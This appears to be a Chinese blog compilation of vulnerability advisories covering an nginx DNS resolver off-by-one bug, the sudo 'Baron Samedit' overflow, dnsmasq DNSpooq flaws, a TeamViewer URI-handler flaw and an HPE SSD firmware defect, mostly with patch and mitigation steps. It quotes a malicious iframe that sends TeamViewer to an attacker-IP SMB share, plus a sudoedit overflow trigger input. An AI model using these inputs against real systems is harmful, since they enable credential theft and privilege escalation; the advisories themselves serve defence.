之前有过一个 nginx resolver 拒绝服务漏洞(CVE-2016-0742),现在又出了一个.

如果没用resolver 参数,那没影响,可以升到最新nginx-1.21.0  来解决.

Changes with nginx 1.21.0                                        25 May 2021

    *) Security: 1-byte memory overwrite might occur during DNS server
       response processing if the "resolver" directive was used, allowing an
       attacker who is able to forge UDP packets from the DNS server to
       cause worker process crash or, potentially, arbitrary code execution
       (CVE-2021-23017).

概述

ngx_resolver_copy()在处理DNS响应时出现一个off-by-one错误，利用该漏洞网络攻击者可以在堆分配的缓冲区中写一个点字符（.’, 0x2E）导致超出范围。 所有配置解析器语法的（resolver xxxx）Nginx实例可以通过DNS响应（响应来自Nginx的DNS请求）来触发该漏洞。 特制数据包允许使用0x2E覆盖下一个堆块元数据的最低有效字节，利用该漏洞攻击者，可以实现Ddos拒绝服务，甚至可能实现远程代码执行。

由于Nginx中缺乏DNS欺骗缓解措施，并且在检查DNS事务ID之前调用了易受攻击的功能，因此远程攻击者可能能够通向中毒服务器注入受毒的DNS响应来利用此漏洞。

漏洞影响

严重等级： 高

漏洞向量： 远程/DNS

确认的受影响版本： 0.6.18-1.20.0

确认的修补版本： 1.21.0，1.20.1

供应商： F5，Inc.

状态： 公开

CVE： CVE-2021-23017

CWE： 193

CVSS得分： 8.1

CVSS向量：CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

漏洞分析

当Nginx配置中设置resolver时，Nginx DNS解析器（core/ngx_resolver.c）用于通过DNS解析多个模块的主机名。

Nginx中通过ngx_resolver_copy()调用来验证和解压缩DNS响应中包含的每个DNS域名，接收网络数据包作为输入和指向正在处理的名称的指针，并在成功后返回指向包含未压缩名称的新分配缓冲区的指针。调用整体上分两步完成的，

1）计算未压缩的域名大小的长度len并验证输入包的合法性，丢弃包含大于128个指针或包含超出输入缓冲区边界的域名。

2）分配输出缓冲区，并将未压缩的域名复制到其中。

第1部分中的大小计算与第2部分中的未压缩的域名之间的不匹配，导致一个len的一个off-by-one错误，导致允许以一个字节为单位写一个点字符超出name->data的边界。

当压缩名称的最后一部分包含一个指向NUL字节的指针时，就会发生计算错误。 尽管计算步骤仅考虑标签之间的点，但每次处理标签并且接着的字符为非NUL时，解压缩步骤都会写入一个点字符。当标签后跟指向NUL字节的指针时，解压缩过程将：

// 1) copy the label to the output buffer,

ngx_strlow(dst, src, n);

dst += n;

src += n;

// 2) read next character,

n = *src++;

// 3) as its a pointer, its not NUL,

if (n != 0) {

// 4) so a dot character that was not accounted for is written out of bounds

*dst++ = ‘.’;

}

// 5) Afterwards, the pointer is followed,

if (n & 0xc0) {

n = ((n & 0x3f) << 8) + *src;

src = &buf[n];

n = *src++;

}

// 6) and a NULL byte is found, signaling the end of the function

if (n == 0) {

name->len = dst – name->data;

return NGX_OK;

}

如果计算的大小恰好与堆块大小对齐，则超出范围的点字符将覆盖下一个堆块长度的元数据中的最低有效字节。这可能会直接导致下一个堆块的大小写入，但还会覆盖3个标志，从而导致 PREV_INUSE被清除并 IS_MMAPPED被设置。

==7863== Invalid write of size 1

==7863== at 0x137C2E: ngx_resolver_copy (ngx_resolver.c:4018)

==7863== by 0x13D12B: ngx_resolver_process_a (ngx_resolver.c:2470)

==7863== by 0x13D12B: ngx_resolver_process_response (ngx_resolver.c:1844)

==7863== by 0x13D46A: ngx_resolver_udp_read (ngx_resolver.c:1574)

==7863== by 0x14AB19: ngx_epoll_process_events (ngx_epoll_module.c:901)

==7863== by 0x1414D4: ngx_process_events_and_timers (ngx_event.c:247)

==7863== by 0x148E57: ngx_worker_process_cycle (ngx_process_cycle.c:719)

==7863== by 0x1474DA: ngx_spawn_process (ngx_process.c:199)

==7863== by 0x1480A8: ngx_start_worker_processes (ngx_process_cycle.c:344)

==7863== by 0x14952D: ngx_master_process_cycle (ngx_process_cycle.c:130)

==7863== by 0x12237F: main (Nginx.c:383)

==7863== Address 0x4bbcfb8 is 0 bytes after a block of size 24 alloc’d

==7863== at 0x483E77F: malloc (vg_replace_malloc.c:307)

==7863== by 0x1448C4: ngx_alloc (ngx_alloc.c:22)

==7863== by 0x137AE4: ngx_resolver_alloc (ngx_resolver.c:4119)

==7863== by 0x137B26: ngx_resolver_copy (ngx_resolver.c:3994)

==7863== by 0x13D12B: ngx_resolver_process_a (ngx_resolver.c:2470)

==7863== by 0x13D12B: ngx_resolver_process_response (ngx_resolver.c:1844)

==7863== by 0x13D46A: ngx_resolver_udp_read (ngx_resolver.c:1574)

==7863== by 0x14AB19: ngx_epoll_process_events (ngx_epoll_module.c:901)

==7863== by 0x1414D4: ngx_process_events_and_timers (ngx_event.c:247)

==7863== by 0x148E57: ngx_worker_process_cycle (ngx_process_cycle.c:719)

==7863== by 0x1474DA: ngx_spawn_process (ngx_process.c:199)

==7863== by 0x1480A8: ngx_start_worker_processes (ngx_process_cycle.c:344)

==7863== by 0x14952D: ngx_master_process_cycle (ngx_process_cycle.c:130)

虽然目前还没有Poc出来，理论上该漏洞可以被用来进行远程代码执行。

攻击向量分析

DNS响应可以通过多种方式触发漏洞。

首先，Nginx必须发送了DNS请求，并且必须等待响应。 然后，可以在DNS响应的多个部分进行投毒：

DNS问题QNAME，

DNS回答名称，

DNS会回答RDATA以获得CNAME和SRV响应，

通过使用多个中毒的QNAME，NAME或RDATA值制作响应，可以在处理响应时多次击中易受攻击的函数，从而有效地执行多次脱机写入。

此外，当攻击者提供中毒的CNAME时，它将以递归方式解决，从而在执行过程中触发了额外的OOB写操作 ngx_resolve_name_locked() 调用ngx_strlow()（ngx_resolver.c：594）和其他OOB读取期间 ngx_resolver_dup()（ngx_resolver.c：790）和 ngx_crc32_short()（ngx_resolver.c：596）。

用于“example.net”请求的DNS响应示例负载，其中包含被污染的CNAME：

稍微不同的有效负载（poc.py中的有效负载）填充了足够的字节以覆盖 next_chunk.mchunk_size带点的最低有效字节：

24字节的标签导致分配了24字节的缓冲区，该缓冲区填充有24字节+一个超出范围的点字符。

漏洞修复和解决

通过向域名解析时，在域名末尾写入的伪造的点字符分配一个额外的字节可以缓解此问题。

受漏洞影响的配置

daemon off;

http{

access_log logs/access.log;

server{

listen 8080;

location / {

resolver 127.0.0.1:1053;

set $dns example.net;

proxy_pass $dns;

}

}

}

events {

worker_connections 1024;

}

https://baijiahao.baidu.com/s?id=1700787515121182676&wfr=spider&for=pc

0x01漏洞简述

2021年01月27日，360CERT监测发现RedHat发布了sudo 缓冲区/栈溢出漏洞的风险通告，该漏洞编号为CVE-2021-3156，漏洞等级：高危，漏洞评分：7.0。

攻击者在取得服务器基础权限的情况下，可以利用sudo基于堆的缓冲区溢出漏洞，获得root权限。

目前debain已经修复该漏洞，centos依然受到影响

对此，360CERT建议广大用户及时将sudo升级到最新版本。与此同时，请做好资产自查以及预防工作，以免遭受黑客攻击。

0x02风险等级

360CERT对该漏洞的评定结果如下

评定方式	等级
威胁等级	高危
影响面	广泛
360CERT评分	7.0

0x03漏洞详情

CVE-2021-3156: 缓冲区溢出漏洞

在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户（普通用户和系统用户，sudoer和非sudoers）都可以利用此漏洞，而无需进行身份验证，攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。

用户可以使用如下方法进行自查：

以非root用户登录系统，并使用命令sudoedit -s /

– 如果响应一个以sudoedit:开头的报错，那么表明存在漏洞。

– 如果响应一个以usage:开头的报错，那么表明补丁已经生效。

0x04影响版本

– sudo:sudo: 1.8.2 – 1.8.31p2

– sudo:sudo: 1.9.0 – 1.9.5p1

0x05修复建议

通用修补建议

下载升级sudo软件包，下载链接为：

sudo软件包下载地址

https://www.sudo.ws/dist/

临时修补建议

对于无法立即更新的用户，建议使用systemtap进行以下临时缓解：

1. 安装所需的systemtap软件包和依赖项：

systemtap yum-utils kernel-devel-"$(uname -r)"

对于RHEL 7，使用命令安装 kernel debuginfo：debuginfo-install -y kernel-"$(uname -r)"。对于RHEL 8，使用命令安装 sudo debuginfo：debuginfo-install sudo。

2. 创建以下systemtap脚本（将文件命名为sudoedit-block.stap）:

probe process("/usr/bin/sudo").function("main") {
        command = cmdline_args(0,0,"");
        if (strpos(command, "edit") >= 0) {
                raise(9);
        }
}

3. 使用以下命令安装脚本：（使用root权限）

# nohup stap -g sudoedit-block.stap &

该脚本将使得易受攻击的sudoedit二进制文件停止工作。sudo命令仍将照常工作。上述更改在重启后失效，必须在每次重启后重新应用。

4. 一旦安装了补丁程序，就可以通过取消systemtap进程来删除systemtap脚本。例如，通过使用：

# kill -s SIGTERM 7590 (其中7590是systemtap进程的PID)

0x06时间线

2021-01-27  RedHat官方发布通告

2021-01-27  360CERT发布通告

0x07参考链接

1、 RedHat官方通告

https://access.redhat.com/security/cve/CVE-2021-3156

2、 CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)

https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit

来源:https://my.oschina.net/u/4600927/blog/4927558

rpm升级来修复

下载系统安装包
centos 5 https://github.com/sudo-project/sudo/releases/download/SUDO_1_9_5p2/sudo-1.9.5-3.el5.x86_64.rpm
centos 6 https://github.com/sudo-project/sudo/releases/download/SUDO_1_9_5p2/sudo-1.9.5-3.el6.x86_64.rpm
centos 7 https://github.com/sudo-project/sudo/releases/download/SUDO_1_9_5p2/sudo-1.9.5-3.el7.x86_64.rpm
ubuntu 16.04 https://github.com/sudo-project/sudo/releases/download/SUDO_1_9_5p2/sudo_1.9.5-3_ubu1604_amd64.deb
ubuntu 18.04 https://github.com/sudo-project/sudo/releases/download/SUDO_1_9_5p2/sudo-ldap_1.9.5-3_ubu1804_amd64.deb
ubuntu 20.04 https://github.com/sudo-project/sudo/releases/download/SUDO_1_9_5p2/sudo_1.9.5-3_ubu2004_amd64.deb
其他看官网 https://www.sudo.ws/download.html

cd /root/src/packages/
wget -N –no-check-certificate https://github.com/sudo-project/sudo/releases/download/SUDO_1_9_5p2/sudo-1.9.5-3.el6.x86_64.rpm && top
ll sudo-1.9.5-3.el6.x86_64.rpm
rpm -Uvh sudo-1.9.5-3.el6.x86_64.rpm
sudo -V
Sudo version 1.9.5p2

漏洞验证-修复完成
sudoedit -s ” perl -e ‘print “A” x 65536’
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-D
directory] [-g group] [-h host] [-p prompt]
[-R directory] [-T timeout] [-u user] file ..

报告编号：B6-2021-012102

报告来源：360CERT

报告作者：360CERT

更新日期：2021-01-21

0x01事件简述

2021年01月21日，360CERT监测发现JSOF发布了DNSpooq的风险通告，事件等级：高危，事件评分：8.1。

DNSpooq是JSOF命名的本次披露的漏洞的统称，该报告主要围绕dnsmasq的漏洞展开。总计包含2处高危漏洞，2处中危漏洞，3处低危漏洞。

dnsmasq中存在多个高危漏洞，影响DNS服务正常的提供，并导致DNS缓存投毒引发以下后果

1. 域名劫持（网站访问劫持、数据窃取）

2. 流量劫持（网站内容劫持、数据窃取、分布式拒绝服务）

对此，360CERT建议广大用户好资产自查以及预防工作，以免遭受黑客攻击。

0x02风险等级

360CERT对该事件的评定结果如下

评定方式	等级
威胁等级	高危
影响面	广泛
360CERT评分	8.1

0x03漏洞详情

漏洞编号	漏洞评分	漏洞类型	漏洞后果
CVE-2020-25681	8.1	启用DNSSEC时，堆的缓冲区溢出	远程代码执行
CVE-2020-25682	8.1	启用DNSSEC时，缓冲区溢出	远程代码执行
CVE-2020-25683	5.9	启用DNSSEC时，堆缓冲区溢出	拒绝服务
CVE-2020-25687	5.9	启用DNSSEC时，堆缓存区溢出	拒绝服务
CVE-2020-25684	4	逻辑错误	拒绝服务
CVE-2020-25685	4	逻辑错误	DNS 缓存投毒
CVE-2020-25686	4	逻辑错误	DNS 缓存投毒

0x04影响版本

–dnsmasq:dnsmsaq: <2.83

0x05修复建议

通用修补建议

发行版

升级dnsmasq至2.83以上 请根据发行版包管理器及时安装并重启dnsmasq，请根据具体情况选择命令。

# 更新软件包
yum update dnsmasq
apt upgrade dnsmasq
# 重启服务
systemctl restart dnsmasq

临时修补建议

网络侧

-禁止从外部网络访问dsnmasq

-设置--dns-forward-max=参数为小于 150 的值

-可以在理解DNSSEC功能的情况下，临时禁用该功能

-可以通过启用一些DNS安全传输的策略(DNS Over TLS, DoH, DoT)

参考命令

命令仅提供参考，具体需要结合服务器的实际情况进行配置

# iptables
sudo iptables -A INPUT -p udp --dport 53 -j DROP 
sudo iptables -A FORWARD -p udp --dport 53 -j DROP 
# firewall-cmd
sudo firewall-cmd --remove-port=53/udp --permanent

0x06相关空间测绘数据

360安全大脑-Quake网络空间测绘系统通过对全网资产测绘，发现dnsmasq具体分布如下图所示。

0x07产品侧解决方案

360城市级网络安全监测服务

360CERT的安全分析人员利用360安全大脑的QUAKE资产测绘平台(quake.360.cn)，通过资产测绘技术的方式，对该漏洞进行监测。可联系相关产品区域负责人或(quake#360.cn)获取对应产品。

360安全分析响应平台

360安全大脑的安全分析响应平台通过网络流量检测、多传感器数据融合关联分析手段，对该类漏洞的利用进行实时检测和阻断，请用户联系相关产品区域负责人或(shaoyulong#360.cn)获取对应产品。

0x08时间线

2021-01-21 360CERT发布通告

2021-01-21 JSOF 披露 DNSpooq 报告

0x09参考链接

1、 DNSpooq-Technical-WP.pdf

2、 DNSpooq

0x0a特制报告下载链接

一直以来，360CERT对全球重要网络安全事件进行快速通报、应急响应。为更好地为政企用户提供最新漏洞以及信息安全事件的安全通告服务，现360CERT正式推出安全通告特制版报告，以便用户做资料留存、传阅研究与查询验证。 用户可直接通过以下链接进行特制报告的下载。Dnsmasq: 多个高危漏洞风险通告

若有订阅意向与定制需求请发送邮件至 g-cert-report#360.cn ，并附上您的 公司名、姓名、手机号、地区、邮箱地址。

一、漏洞概要

2020年8月6日，TeamViewer官方发布了TeamViewer

URL处理的风险通告。TeamViewer存在未引用的搜索路径或元素的安全缺陷，由于应用程序没有正确引用它的自定义URI处理程序，当安装了TeamViewer的易受攻击版本的用户访问恶意创建的网站时，可能会被黑客利用。深信服安全研究团队依据漏洞重要性和影响力进行评估，作出漏洞通告。

说人话就是当你用有缺陷的版本访问到某恶意网站时,会将teamviewer的用户和密码发送给黑客,黑客反解密码后就可以登录你电脑操作了.在当前疫情环境下,很影响远程办公.

二、漏洞分析

2.1 TeamViewer介绍

TeamViewer是由德国公司TeamViewer GmbH开发的应用程序，可用于Windows，macOS，Linux，Chrome OS，iOS，Android，Windows RT Windows Phone 8和BlackBerry操作系统。

它主要用于远程访问和控制各种类型的计算机系统和移动设备，但也提供协作和演示功能（例如，桌面共享，Web会议，文件传输等）。

2.2 漏洞描述

TeamViewer存在未引用的搜索路径或元素的安全缺陷，由于应用程序没有正确引用它的自定义URI处理程序，当安装有TeamViewer的易受攻击版本的系统访问恶意创建的网站时，可能会被利用。

攻击者可以使用精心制作的URL（iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’）将恶意iframe嵌入网站中，从而启动TeamViewer Windows桌面客户端并强制其打开远程SMB共享。

Windows将在打开SMB共享时，执行NTLM身份验证，并且可以转发该请求（使用如响应程序之类的工具）以执行代码（或捕获该请求以进行哈希破解）。

该漏洞的利用可以远程启动，并且不需要事先进行身份验证，是水坑攻击的理想选择。

三、影响范围

【影响版本】

TeamViewer < 8.0.258861

TeamViewer < 9.0.28860

TeamViewer < 10.0.258873

TeamViewer < 11.0.258870

TeamViewer < 12.0.258869

TeamViewer < 13.2.36220

TeamViewer < 14.2.56676

TeamViewer < 15.8.3

四、解决方案

打开TeamViewer -> 点击按钮帮助 -> 点击按钮关于TeamViewer -> 查看TeamViewer版本号。

以确保TeamViewer的版本是非漏洞版本。

4.2 修复方案

针对此漏洞官方已在8.0.258861、9.0.258860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350和15.8.3版本中修复。

请受影响的用户参考以下链接安装补丁更新：https://www.teamviewer.com/en/download/previous-versions/

五、时间轴

2020/8/6 TeamViewer发布通告

2020/8/10 深信服千里目安全实验室发布通告

六、参考链接

TeamViewer flaw could be exploited to crack users’ password

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

https://jeffs.sh/CVEs/CVE-2020-13699.txt

近日HPE惠与（原HP惠普企业部门分拆而来）发布安全公告，部分服务器和存储产品中所用的固态硬盘固件存在缺陷，通电32746小时（3年零270天8小时）后硬盘上的数据将丢失！

这些HPE服务器或存储产品中使用了来自第三方供应商的SAS接口固态硬盘，受固件BUG影响，一旦通电时间达到32746小时，硬盘就会发生故障，数据将丢失并且不可恢复。

由于存储阵列中通常采用同款型号的硬盘，它们有可能同时因固件缺陷而失效，导致RAID冗余阵列也无法保护数据安全。HPE要求表格中列出的20种型号的固态硬盘尽快升级至HPD8固件版本。

考虑到一些型号的固态硬盘拥有高达15.3TB的容量，一旦出现故障将会导致大量数据无法恢复。尽管HPE没有点明具体是哪一家供应商的缺陷，但通过型号不难查明它们来自三星：

同操作系统一样，SSD固件BUG由来已久，上次我们听到与通电时间有关的固件BUG还是美光M4的固件门事件，当时M4被发现会在通电5184小时后卡死，并在重新启动后每小时卡死一次，导致没有保存的数据丢失。据说该故障与固态硬盘的SMART Power On Hours计数器有关。

三星这次出现在企业级固态硬盘中的32746小时BUG，潜伏时间要更长一些，后果也更为惨重（盘上全部数据无法恢复）。目前还不清楚除HPE之外是否还有其他服务器中内置的三星OEM固态硬盘存在相同缺陷。